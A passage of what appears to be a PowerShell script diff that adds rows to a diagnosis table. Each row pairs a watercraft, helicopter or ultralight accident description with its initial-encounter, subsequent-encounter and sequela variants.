+ $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being washed overboard from other unpowered watercraft","Drowning and submersion due to being washed overboard from other unpowered watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being washed overboard from other unpowered watercraft","Drowning and submersion due to being washed overboard from other unpowered watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being washed overboard from unspecified watercraft","Drowning and submersion due to being washed overboard from unspecified watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being washed overboard from unspecified watercraft","Drowning and submersion due to being washed overboard from unspecified watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being washed overboard from unspecified watercraft","Drowning and submersion due to being washed overboard from unspecified watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Burn due to localized fire on board merchant vessel","Burn due to localized fire on board merchant vessel, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn due to localized fire on board merchant vessel","Burn due to localized fire on board merchant vessel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn due to localized fire on board merchant vessel","Burn due to localized fire on board merchant vessel, sequela") + $null = $DiagnosisList.Rows.Add("Burn due to localized fire on board passenger vessel","Burn due to localized fire on board passenger vessel, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn due to localized fire on board passenger vessel","Burn due to localized fire on board passenger vessel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn due to localized fire on board passenger vessel","Burn due to localized fire on board passenger vessel, sequela") + $null = $DiagnosisList.Rows.Add("Burn due to localized fire on board fishing boat","Burn due to localized fire on board fishing boat, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn due to localized fire on board fishing boat","Burn due to localized fire on board fishing boat, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn due to localized fire on board fishing boat","Burn due to localized fire on board fishing boat, sequela") + $null = $DiagnosisList.Rows.Add("Burn due to localized fire on board other powered watercraft","Burn due to localized fire on board other powered watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn due to localized fire on board other powered watercraft","Burn due to localized fire on board other powered watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn due to localized fire on board other powered watercraft","Burn due to localized fire on board other powered watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Burn due to localized fire on board sailboat","Burn due to localized fire on board sailboat, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn due to localized fire on board sailboat","Burn due to localized fire on board sailboat, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn due to localized fire on board sailboat","Burn due to localized fire on board sailboat, sequela") + $null = $DiagnosisList.Rows.Add("Burn due to localized fire on board unspecified watercraft","Burn due to localized fire on board unspecified watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn due to localized fire on board unspecified watercraft","Burn due to localized fire on board unspecified watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn due to localized fire on board unspecified watercraft","Burn due to localized fire on board unspecified watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Other burn on board merchant vessel","Other burn on board merchant vessel, initial encounter") + $null = $DiagnosisList.Rows.Add("Other burn on board merchant vessel","Other burn on board merchant vessel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other burn on board merchant vessel","Other burn on board merchant vessel, sequela") + $null = $DiagnosisList.Rows.Add("Other burn on board passenger vessel","Other burn on board passenger vessel, initial encounter") + $null = $DiagnosisList.Rows.Add("Other burn on board passenger vessel","Other burn on board passenger vessel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other burn on board passenger vessel","Other burn on board passenger vessel, sequela") + $null = $DiagnosisList.Rows.Add("Other burn on board fishing boat","Other burn on board fishing boat, initial encounter") + $null = $DiagnosisList.Rows.Add("Other burn on board fishing boat","Other burn on board fishing boat, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other burn on board fishing boat","Other burn on board fishing boat, sequela") + $null = $DiagnosisList.Rows.Add("Other burn on board other powered watercraft","Other burn on board other powered watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Other burn on board other powered watercraft","Other burn on board other powered watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other burn on board other powered watercraft","Other burn on board other powered watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Other burn on board sailboat","Other burn on board sailboat, initial encounter") + $null = $DiagnosisList.Rows.Add("Other burn on board sailboat","Other burn on board sailboat, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other burn on board sailboat","Other burn on board sailboat, sequela") + $null = $DiagnosisList.Rows.Add("Other burn on board unspecified watercraft","Other burn on board unspecified watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Other burn on board unspecified watercraft","Other burn on board unspecified watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other burn on board unspecified watercraft","Other burn on board unspecified watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Heat exposure on board merchant ship","Heat exposure on board merchant ship, initial encounter") + $null = $DiagnosisList.Rows.Add("Heat exposure on board merchant ship","Heat exposure on board merchant ship, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Heat exposure on board merchant ship","Heat exposure on board merchant ship, sequela") + $null = $DiagnosisList.Rows.Add("Heat exposure on board passenger ship","Heat exposure on board passenger ship, initial encounter") + $null = $DiagnosisList.Rows.Add("Heat exposure on board passenger ship","Heat exposure on board passenger ship, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Heat exposure on board passenger ship","Heat exposure on board passenger ship, sequela") + $null = $DiagnosisList.Rows.Add("Heat exposure on board fishing boat","Heat exposure on board fishing boat, initial encounter") + $null = $DiagnosisList.Rows.Add("Heat exposure on board fishing boat","Heat exposure on board fishing boat, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Heat exposure on board fishing boat","Heat exposure on board fishing boat, sequela") + $null = $DiagnosisList.Rows.Add("Heat exposure on board other powered watercraft","Heat exposure on board other powered watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Heat exposure on board other powered watercraft","Heat exposure on board other powered watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Heat exposure on board other powered watercraft","Heat exposure on board other powered watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Heat exposure on board sailboat","Heat exposure on board sailboat, initial encounter") + $null = $DiagnosisList.Rows.Add("Heat exposure on board sailboat","Heat exposure on board sailboat, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Heat exposure on board sailboat","Heat exposure on board sailboat, sequela") + $null = $DiagnosisList.Rows.Add("Heat exposure on board unspecified watercraft","Heat exposure on board unspecified watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Heat exposure on board unspecified watercraft","Heat exposure on board unspecified watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Heat exposure on board unspecified watercraft","Heat exposure on board unspecified watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Fall on board merchant ship","Fall on board merchant ship, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall on board merchant ship","Fall on board merchant ship, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall on board merchant ship","Fall on board merchant ship, sequela") + $null = $DiagnosisList.Rows.Add("Fall on board passenger ship","Fall on board passenger ship, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall on board passenger ship","Fall on board passenger ship, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall on board passenger ship","Fall on board passenger ship, sequela") + $null = $DiagnosisList.Rows.Add("Fall on board fishing boat","Fall on board fishing boat, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall on board fishing boat","Fall on board fishing boat, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall on board fishing boat","Fall on board fishing boat, sequela") + $null = $DiagnosisList.Rows.Add("Fall on board other powered watercraft","Fall on board other powered watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall on board other powered watercraft","Fall on board other powered watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall on board other powered watercraft","Fall on board other powered watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Fall on board sailboat","Fall on board sailboat, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall on board sailboat","Fall on board sailboat, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall on board sailboat","Fall on board sailboat, sequela") + $null = $DiagnosisList.Rows.Add("Fall on board canoe or kayak","Fall on board canoe or kayak, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall on board canoe or kayak","Fall on board canoe or kayak, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall on board canoe or kayak","Fall on board canoe or kayak, sequela") + $null = $DiagnosisList.Rows.Add("Fall on board (nonpowered) inflatable craft","Fall on board (nonpowered) inflatable craft, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall on board (nonpowered) inflatable craft","Fall on board (nonpowered) inflatable craft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall on board (nonpowered) inflatable craft","Fall on board (nonpowered) inflatable craft, sequela") + $null = $DiagnosisList.Rows.Add("Fall on board other unpowered watercraft","Fall on board other unpowered watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall on board other unpowered watercraft","Fall on board other unpowered watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall on board other unpowered watercraft","Fall on board other unpowered watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Fall on board unspecified watercraft","Fall on board unspecified watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall on board unspecified watercraft","Fall on board unspecified watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall on board unspecified watercraft","Fall on board unspecified watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Struck by falling object on merchant ship","Struck by falling object on merchant ship, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by falling object on merchant ship","Struck by falling object on merchant ship, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by falling object on merchant ship","Struck by falling object on merchant ship, sequela") + $null = $DiagnosisList.Rows.Add("Struck by falling object on passenger ship","Struck by falling object on passenger ship, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by falling object on passenger ship","Struck by falling object on passenger ship, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by falling object on passenger ship","Struck by falling object on passenger ship, sequela") + $null = $DiagnosisList.Rows.Add("Struck by falling object on fishing boat","Struck by falling object on fishing boat, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by falling object on fishing boat","Struck by falling object on fishing boat, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by falling object on fishing boat","Struck by falling object on fishing boat, sequela") + $null = $DiagnosisList.Rows.Add("Struck by falling object on other powered watercraft","Struck by falling object on other powered watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by falling object on other powered watercraft","Struck by falling object on other powered watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by falling object on other powered watercraft","Struck by falling object on other powered watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Struck by falling object on sailboat","Struck by falling object on sailboat, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by falling object on sailboat","Struck by falling object on sailboat, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by falling object on sailboat","Struck by falling object on sailboat, sequela") + $null = $DiagnosisList.Rows.Add("Struck by falling object on other unpowered watercraft","Struck by falling object on other unpowered watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by falling object on other unpowered watercraft","Struck by falling object on other unpowered watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by falling object on other unpowered watercraft","Struck by falling object on other unpowered watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Struck by falling object on unspecified watercraft","Struck by falling object on unspecified watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Struck by falling object on unspecified watercraft","Struck by falling object on unspecified watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Struck by falling object on unspecified watercraft","Struck by falling object on unspecified watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Explosion on board merchant ship","Explosion on board merchant ship, initial encounter") + $null = $DiagnosisList.Rows.Add("Explosion on board merchant ship","Explosion on board merchant ship, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Explosion on board merchant ship","Explosion on board merchant ship, sequela") + $null = $DiagnosisList.Rows.Add("Explosion on board passenger ship","Explosion on board passenger ship, initial encounter") + $null = $DiagnosisList.Rows.Add("Explosion on board passenger ship","Explosion on board passenger ship, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Explosion on board passenger ship","Explosion on board passenger ship, sequela") + $null = $DiagnosisList.Rows.Add("Explosion on board fishing boat","Explosion on board fishing boat, initial encounter") + $null = $DiagnosisList.Rows.Add("Explosion on board fishing boat","Explosion on board fishing boat, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Explosion on board fishing boat","Explosion on board fishing boat, sequela") + $null = $DiagnosisList.Rows.Add("Explosion on board other powered watercraft","Explosion on board other powered watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Explosion on board other powered watercraft","Explosion on board other powered watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Explosion on board other powered watercraft","Explosion on board other powered watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Explosion on board sailboat","Explosion on board sailboat, initial encounter") + $null = $DiagnosisList.Rows.Add("Explosion on board sailboat","Explosion on board sailboat, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Explosion on board sailboat","Explosion on board sailboat, sequela") + $null = $DiagnosisList.Rows.Add("Explosion on board unspecified watercraft","Explosion on board unspecified watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Explosion on board unspecified watercraft","Explosion on board unspecified watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Explosion on board unspecified watercraft","Explosion on board unspecified watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Machinery accident on board merchant ship","Machinery accident on board merchant ship, initial encounter") + $null = $DiagnosisList.Rows.Add("Machinery accident on board merchant ship","Machinery accident on board merchant ship, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Machinery accident on board merchant ship","Machinery accident on board merchant ship, sequela") + $null = $DiagnosisList.Rows.Add("Machinery accident on board passenger ship","Machinery accident on board passenger ship, initial encounter") + $null = $DiagnosisList.Rows.Add("Machinery accident on board passenger ship","Machinery accident on board passenger ship, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Machinery accident on board passenger ship","Machinery accident on board passenger ship, sequela") + $null = $DiagnosisList.Rows.Add("Machinery accident on board fishing boat","Machinery accident on board fishing boat, initial encounter") + $null = $DiagnosisList.Rows.Add("Machinery accident on board fishing boat","Machinery accident on board fishing boat, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Machinery accident on board fishing boat","Machinery accident on board fishing boat, sequela") + $null = $DiagnosisList.Rows.Add("Machinery accident on board other powered watercraft","Machinery accident on board other powered watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Machinery accident on board other powered watercraft","Machinery accident on board other powered watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Machinery accident on board other powered watercraft","Machinery accident on board other powered watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Machinery accident on board sailboat","Machinery accident on board sailboat, initial encounter") + $null = $DiagnosisList.Rows.Add("Machinery accident on board sailboat","Machinery accident on board sailboat, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Machinery accident on board sailboat","Machinery accident on board sailboat, sequela") + $null = $DiagnosisList.Rows.Add("Machinery accident on board unspecified watercraft","Machinery accident on board unspecified watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Machinery accident on board unspecified watercraft","Machinery accident on board unspecified watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Machinery accident on board unspecified watercraft","Machinery accident on board unspecified watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident on board merchant ship","Other injury due to other accident on board merchant ship, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident on board merchant ship","Other injury due to other accident on board merchant ship, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident on board merchant ship","Other injury due to other accident on board merchant ship, sequela") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident on board passenger ship","Other injury due to other accident on board passenger ship, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident on board passenger ship","Other injury due to other accident on board passenger ship, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident on board passenger ship","Other injury due to other accident on board passenger ship, sequela") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident on board fishing boat","Other injury due to other accident on board fishing boat, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident on board fishing boat","Other injury due to other accident on board fishing boat, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident on board fishing boat","Other injury due to other accident on board fishing boat, sequela") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident on board other powered watercraft","Other injury due to other accident on board other powered watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident on board other powered watercraft","Other injury due to other accident on board other powered watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident on board other powered watercraft","Other injury due to other accident on board other powered watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident on board sailboat","Other injury due to other accident on board sailboat, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident on board sailboat","Other injury due to other accident on board sailboat, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident on board sailboat","Other injury due to other accident on board sailboat, sequela") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident on board canoe or kayak","Other injury due to other accident on board canoe or kayak, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident on board canoe or kayak","Other injury due to other accident on board canoe or kayak, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident on board canoe or kayak","Other injury due to other accident on board canoe or kayak, sequela") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident on board (nonpowered) inflatable craft","Other injury due to other accident on board (nonpowered) inflatable craft, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident on board (nonpowered) inflatable craft","Other injury due to other accident on board (nonpowered) inflatable craft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident on board (nonpowered) inflatable craft","Other injury due to other accident on board (nonpowered) inflatable craft, sequela") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident on board water-skis","Other injury due to other accident on board water-skis, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident on board water-skis","Other injury due to other accident on board water-skis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident on board water-skis","Other injury due to other accident on board water-skis, sequela") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident on board other unpowered watercraft","Other injury due to other accident on board other unpowered watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident on board other unpowered watercraft","Other injury due to other accident on board other unpowered watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident on board other unpowered watercraft","Other injury due to other accident on board other unpowered watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident on board unspecified watercraft","Other injury due to other accident on board unspecified watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident on board unspecified watercraft","Other injury due to other accident on board unspecified watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident on board unspecified watercraft","Other injury due to other accident on board unspecified watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Hitting object or bottom of body of water due to fall from watercraft","Hitting object or bottom of body of water due to fall from watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Hitting object or bottom of body of water due to fall from watercraft","Hitting object or bottom of body of water due to fall from watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Hitting object or bottom of body of water due to fall from watercraft","Hitting object or bottom of body of water due to fall from watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Bather struck by powered watercraft","Bather struck by powered watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Bather struck by powered watercraft","Bather struck by powered watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Bather struck by powered watercraft","Bather struck by powered watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Bather struck by nonpowered watercraft","Bather struck by nonpowered watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Bather struck by nonpowered watercraft","Bather struck by nonpowered watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Bather struck by nonpowered watercraft","Bather struck by nonpowered watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Rider of nonpowered watercraft struck by other nonpowered watercraft","Rider of nonpowered watercraft struck by other nonpowered watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Rider of nonpowered watercraft struck by other nonpowered watercraft","Rider of nonpowered watercraft struck by other nonpowered watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Rider of nonpowered watercraft struck by other nonpowered watercraft","Rider of nonpowered watercraft struck by other nonpowered watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Rider of nonpowered watercraft struck by powered watercraft","Rider of nonpowered watercraft struck by powered watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Rider of nonpowered watercraft struck by powered watercraft","Rider of nonpowered watercraft struck by powered watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Rider of nonpowered watercraft struck by powered watercraft","Rider of nonpowered watercraft struck by powered watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Injury to rider of (inflatable) recreational watercraft being pulled behind other watercraft","Injury to rider of (inflatable) recreational watercraft being pulled behind other watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury to rider of (inflatable) recreational watercraft being pulled behind other watercraft","Injury to rider of (inflatable) recreational watercraft being pulled behind other watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury to rider of (inflatable) recreational watercraft being pulled behind other watercraft","Injury to rider of (inflatable) recreational watercraft being pulled behind other watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Injury to rider of non-recreational watercraft being pulled behind other watercraft","Injury to rider of non-recreational watercraft being pulled behind other watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury to rider of non-recreational watercraft being pulled behind other watercraft","Injury to rider of non-recreational watercraft being pulled behind other watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury to rider of non-recreational watercraft being pulled behind other watercraft","Injury to rider of non-recreational watercraft being pulled behind other watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Injury to barefoot water-skier","Injury to barefoot water-skier, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury to barefoot water-skier","Injury to barefoot water-skier, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury to barefoot water-skier","Injury to barefoot water-skier, sequela") + $null = $DiagnosisList.Rows.Add("Civilian watercraft involved in water transport accident with military watercraft","Civilian watercraft involved in water transport accident with military watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Civilian watercraft involved in water transport accident with military watercraft","Civilian watercraft involved in water transport accident with military watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Civilian watercraft involved in water transport accident with military watercraft","Civilian watercraft involved in water transport accident with military watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Civilian in water injured by military watercraft","Civilian in water injured by military watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Civilian in water injured by military watercraft","Civilian in water injured by military watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Civilian in water injured by military watercraft","Civilian in water injured by military watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Other water transport accident involving military watercraft","Other water transport accident involving military watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Other water transport accident involving military watercraft","Other water transport accident involving military watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other water transport accident involving military watercraft","Other water transport accident involving military watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Other water transport accident","Other water transport accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Other water transport accident","Other water transport accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other water transport accident","Other water transport accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified water transport accident","Unspecified water transport accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified water transport accident","Unspecified water transport accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified water transport accident","Unspecified water transport accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified helicopter accident injuring occupant","Unspecified helicopter accident injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified helicopter accident injuring occupant","Unspecified helicopter accident injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified helicopter accident injuring occupant","Unspecified helicopter accident injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Helicopter crash injuring occupant","Helicopter crash injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Helicopter crash injuring occupant","Helicopter crash injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Helicopter crash injuring occupant","Helicopter crash injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Forced landing of helicopter injuring occupant","Forced landing of helicopter injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Forced landing of helicopter injuring occupant","Forced landing of helicopter injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Forced landing of helicopter injuring occupant","Forced landing of helicopter injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Helicopter collision injuring occupant","Helicopter collision injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Helicopter collision injuring occupant","Helicopter collision injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Helicopter collision injuring occupant","Helicopter collision injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Helicopter fire injuring occupant","Helicopter fire injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Helicopter fire injuring occupant","Helicopter fire injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Helicopter fire injuring occupant","Helicopter fire injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Helicopter explosion injuring occupant","Helicopter explosion injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Helicopter explosion injuring occupant","Helicopter explosion injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Helicopter explosion injuring occupant","Helicopter explosion injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Other helicopter accident injuring occupant","Other helicopter accident injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Other helicopter accident injuring occupant","Other helicopter accident injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other helicopter accident injuring occupant","Other helicopter accident injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified ultralight, microlight or powered-glider accident injuring occupant","Unspecified ultralight, microlight or powered-glider accident injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified ultralight, microlight or powered-glider accident injuring occupant","Unspecified ultralight, microlight or powered-glider accident injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified ultralight, microlight or powered-glider accident injuring occupant","Unspecified ultralight, microlight or powered-glider accident injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Ultralight, microlight or powered-glider crash injuring occupant","Ultralight, microlight or powered-glider crash injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Ultralight, microlight or powered-glider crash injuring occupant","Ultralight, microlight or powered-glider crash injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Ultralight, microlight or powered-glider crash injuring occupant","Ultralight, microlight or powered-glider crash injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Forced landing of ultralight, microlight or powered-glider injuring occupant","Forced landing of ultralight, microlight or powered-glider injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Forced landing of ultralight, microlight or powered-glider injuring occupant","Forced landing of ultralight, microlight or powered-glider injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Forced landing of ultralight, microlight or powered-glider injuring occupant","Forced landing of ultralight, microlight or powered-glider injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Ultralight, microlight or powered-glider collision injuring occupant","Ultralight, microlight or powered-glider collision injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Ultralight, microlight or powered-glider collision injuring occupant","Ultralight, microlight or powered-glider collision injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Ultralight, microlight or powered-glider collision injuring occupant","Ultralight, microlight or powered-glider collision injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Ultralight, microlight or powered-glider fire injuring occupant","Ultralight, microlight or powered-glider fire injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Ultralight, microlight or powered-glider fire injuring occupant","Ultralight, microlight or powered-glider fire injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Ultralight, microlight or powered-glider fire injuring occupant","Ultralight, microlight or powered-glider fire injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Ultralight, microlight or powered-glider explosion injuring occupant","Ultralight, microlight or powered-glider explosion injuring occupant, initial encounter") + $null = $DiagnosisList.Rows.Add("Ultralight, microlight or powered-glider explosion injuring occupant","Ultralight, microlight or powered-glider explosion injuring occupant, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Ultralight, microlight or powered-glider explosion injuring occupant","Ultralight, microlight or powered-glider explosion injuring occupant, sequela") + $null = $DiagnosisList.Rows.Add("Other ultralight, microlight or powered-glider accident injuring occupant","Other ultralight, microlight or powered-glider accident injuring occupant, initial encounter") + $null = 